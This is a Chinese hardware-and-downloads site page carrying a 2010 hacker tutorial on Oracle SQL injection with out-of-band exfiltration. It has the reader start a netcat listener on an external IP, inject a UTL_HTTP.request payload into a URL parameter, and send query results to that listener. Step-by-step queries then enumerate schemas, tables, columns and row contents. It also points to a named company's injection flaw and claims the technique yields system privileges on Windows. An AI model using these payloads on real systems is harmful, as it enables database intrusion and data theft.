最近文章更新
- 1966年生产的广州 珠江 SB6-2型 ..
- HD6870/6850全面评测,让你大饱眼..
- 百万现金刚入门 中国7大奢华私人..
- 罕见4G希捷酷鱼系类万转SCSI服务..
- IBM 6x86MX PR333 CPU
- 采用MC68000 CPU的进口老计算机主..
- 1989年IBM-XT机软驱
- BC3型饱和标准电池拆解
- JUKO ST
- Kingston 品牌的CPU
- YAMAHA 719
- intel 30线 内存条
- intel mmx cpu和主板
- 首款xHCI 1.0正式版标准USB 3.0控..
- 《极品飞车:地下狂飙》纹理MOD视..
- USB接口加扩展子卡:影驰神秘GTX..
- 阿里巴巴将发布浏览器 核心不是W..
- 黄仁勋大秀NVIDIA LOGO纹身
- Google Earth上的奇特卫星图片
- 开火!讯景限量版HD 5970详细测试..
相关文章链接
本类文章排行
最新新闻资讯
本周下载排行
- ArcSoft TotalMedia Theatre 3 P..
- Windows 7 Build 7600 16385 RTM..
- 《姗姗来迟软件光盘+飞扬PE工具箱..
- MSDN Windows 7 RTL 7600 Ultima..
- Windows 7 Home Premium (x86) -..
- Windows Virtual PC (x86) - (Mu..
- MSDN Windows 7 Language Pack X..
- Windows 7 Language Pack (x64) ..
- Windows 7 Starter (x86) - DVD ..
- Windows 7 Professional (x86) -..
- Windows 7 Language Pack (x86) ..
- Windows 7 Home Premium (x64) -..
- Windows XP Mode (x86, x64) - (..
- 7127.0.090507-1820_x86fre_clie..
- DMG2ISO
本月下载排行
- ArcSoft TotalMedia Theatre 3 P..
- Windows 7 Build 7600 16385 RTM..
- 《姗姗来迟软件光盘+飞扬PE工具箱..
- MSDN Windows 7 RTL 7600 Ultima..
- MSDN Windows 7 Language Pack X..
- Windows 7 Home Premium (x86) -..
- Windows 7 Language Pack (x64) ..
- Windows 7 Professional (x86) -..
- 7127.0.090507-1820_x86fre_clie..
- Windows 7 Professional (x64) -..
- Windows 7 Starter (x86) - DVD ..
- Windows Virtual PC (x86) - (Mu..
- Windows 7 Ultimate (x64) - DVD..
- Lenovo Windows 7 Ultimate OEM ..
- Windows 7 Home Premium (x64) -..
- 阅览次数: 文章来源: 原文作者: 整理日期: 2010-05-22
Oracle注射技术:Oracle+nc注射
Oracle注射技术:Oracle+nc注射
Oracle注射技术:Oracle+nc注射
作者:Kindle
MSN :Kindle@live.cn
Blog:http://hi.baidu.com/system_exp
Team:反安全技术小组 (http://bbs.exploits.com.cn)
首先外网nc监听对应的端口
url语句简单如下所示:
http://www.exploits.com.cn/Kindle?jsp=1 and UTL_HTTP.request('外网ip:port/'||(sql语句))=1--
内容如下:
and UTL_HTTP.request('外网ip:port/'||(sql语句))=1--
爆库:
select owner from all_tables where rownum=1
select owner from all_tables where owner<>'第一个库名' and rownum=1
select owner from all_tables where owner<>'第一个库名' and owner<>'第二个'and rownum=1
select owner from all_tables where owner<>'第一个库名' and owner<>'第一个库名' and rownum=1
以此论推
爆表:
select TABLE_NAME from all_tables where owner='库名'and rownum=1
select TABLE_NAME from all_tables where owner='库名'and rownum=1 and TABLE_NAME<>'表名1'
select TABLE_NAME from all_tables where owner='库名'and rownum=1 and TABLE_NAME<>'表名1' and TABLE_NAME<>'表名2'
以此论推
爆列:
select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1
select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1 and COLUMN_NAME<>'第一个爆出的列名'
select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1 and COLUMN_NAME<>'第一个爆出的列名' and COLUMN_NAME<>'第二个爆出的列名'
爆内容:
第一个内容:select 列名 from 表名 where rownum=1
第二个内容:select 列名 from 表名 where rownum=1 and 列名<>'第一个值'
第三个内容:select 列名 from 表名 where rownum=1 and 列名<>'第一个值' and 列名<>'第二个值'
以此论推
现在大家转过头来看下“万网的尴尬-万网ORACLE注入漏洞曝光”
http://bbs.exploits.com.cn/read.php?tid-144.html
是不是很明了了...o(∩_∩)o...哈哈
注:
1:在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中,以供给大家更直观、简洁、有效的参考资料
2:针对unix和linux操作系统方面对于Oracle也会作出分析,相信Oracle注射将会成为转入高级Hack入侵的桥梁
3.这是个系列文章,后文有待更新